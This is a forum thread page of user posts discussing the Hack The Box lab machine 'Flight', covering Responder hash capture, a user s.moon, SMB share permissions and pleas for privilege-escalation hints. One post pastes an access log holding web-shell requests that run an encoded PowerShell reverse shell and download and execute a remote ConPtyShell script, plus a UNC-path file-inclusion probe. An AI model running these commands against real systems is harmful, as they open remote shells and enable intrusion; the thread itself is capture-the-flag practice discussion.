Return to forum
Flight - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
Elite User
Elite
Posts: 166
Threads: 0
Joined: N/A
Reputation: 5

#21
November 5, 2022 at 11:39 PM
@loge23, Nice you are the best  :heart:. but where you guys get this password from svc_apache ? kerberos pre authentication ? : from a file with SSRF ?
Reply
Member
Member
Posts: 26
Threads: 0
Joined: N/A
Reputation: 2

#22
November 5, 2022 at 11:55 PM
(November 5, 2022, 11:39 PM)yumi Wrote: @loge23, Nice you are the best  :heart:. but where you guys get this password from svc_apache ? kerberos pre authentication ? : from a file with SSRF ?


Responder
Reply
Elite User
Elite
Posts: 166
Threads: 0
Joined: N/A
Reputation: 5

#23
November 6, 2022 at 12:12 AM
it was one of the things I tried but mysteriously I get the connection in the reply I see the verbose but no hash, I'll restart and try on another machine.
Reply
Member
Member
Posts: 7
Threads: 0
Joined: N/A
Reputation: 0

#24
November 6, 2022 at 1:46 AM
(November 5, 2022, 11:17 PM)yumi Wrote: where you get S.moon ? stuck bad in this machine today. >.<


I have s.moon user too, but dont know what to do next... Any hint?
Reply
Member
Member
Posts: 21
Threads: 0
Joined: N/A
Reputation: 0

#25
November 6, 2022 at 2:49 AM
help me in privilege escalation?
Reply
Member
Member
Posts: 22
Threads: 0
Joined: N/A
Reputation: 0

#26
November 6, 2022 at 3:52 AM
rabbit hole ?
acces.log
192.168.22.248 - - [23/Sep/2022:00:37:33 -0700] "GET /rev.php?cmd=powershell%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAuADIANAA4ACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA== HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
192.168.22.248 - - [23/Sep/2022:00:38:10 -0700] "GET /rev.php?cmd=IEX(IWR%20https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1%20-UseBasicParsing);%20Invoke-ConPtyShell%20192.168.22.248%209001 HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
192.168.22.248 - - [23/Sep/2022:00:38:27 -0700] "GET /rev.php?cmd=powershell%20IEX(IWR%20https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1%20-UseBasicParsing);%20Invoke-ConPtyShell%20192.168.22.248%209001 HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
192.168.22.248 - - [23/Sep/2022:00:40:00 -0700] "GET /rev.php?cmd=powershell%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAuADIANAA4ACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA== HTTP/1.1" 200 294 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
192.168.22.248 - - [23/Sep/2022:00:47:19 -0700] "GET /rev.php?cmd=powershell%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAuADIANAA4ACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA== HTTP/1.1" 404 296 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
10.10.14.6 - - [24/Oct/2022:20:47:30 -0700] "GET /index.php?view=//10.10.14.6/share/poc.txt HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0"
Reply
Banned
Posts: 28
Threads: 0
Joined: N/A
Reputation: 0

#27
November 6, 2022 at 6:11 AM
Lmao at this user's description:

GET-DESC... flight.htb      389    G0              User: I.Francis description: Nobody knows why he's here
Reply
Member
Member
Posts: 46
Threads: 0
Joined: N/A
Reputation: 0

#28
November 6, 2022 at 6:25 AM
(November 6, 2022, 06:11 AM)htbhtbhtb Wrote: Lmao at this user's description:

GET-DESC... flight.htb      389    G0              User: I.Francis description: Nobody knows why he's here


what do i do after user s.moon???
Reply
Member
Member
Posts: 33
Threads: 0
Joined: N/A
Reputation: 0

#29
November 6, 2022 at 6:30 AM
Im Stuck To s.moon Has Write Access To The Share Shared But I Havent Been Able To Write To It

[+] IP: flight.htb:445  Name: unknown                                         
        Disk                                                    Permissions    Comment
        ----                                                    -----------    -------
        ADMIN$                                                  NO ACCESS      Remote Admin
        C$                                                      NO ACCESS      Default share
        IPC$                                                    READ ONLY      Remote IPC
        NETLOGON                                                READ ONLY      Logon server share
        Shared                                                  READ, WRITE
        SYSVOL                                                  READ ONLY      Logon server share
        Users                                                  READ ONLY
        Web                                                    READ ONLY
Reply
Member
Member
Posts: 46
Threads: 0
Joined: N/A
Reputation: 0

#30
November 6, 2022 at 6:34 AM
(November 6, 2022, 06:30 AM)vuln63 Wrote: Im Stuck To s.moon Has Write Access To The Share Shared But I Havent Been Able To Write To It

[+] IP: flight.htb:445  Name: unknown                                         
        Disk                                                    Permissions    Comment
        ----                                                    -----------    -------
        ADMIN$                                                  NO ACCESS      Remote Admin
        C$                                                      NO ACCESS      Default share
        IPC$                                                    READ ONLY      Remote IPC
        NETLOGON                                                READ ONLY      Logon server share
        Shared                                                  READ, WRITE
        SYSVOL                                                  READ ONLY      Logon server share
        Users                                                  READ ONLY
        Web                                                    READ ONLY


Do you think this was correct path
Reply


 Users viewing this thread: Flight - HTB [Discussion]: No users currently viewing.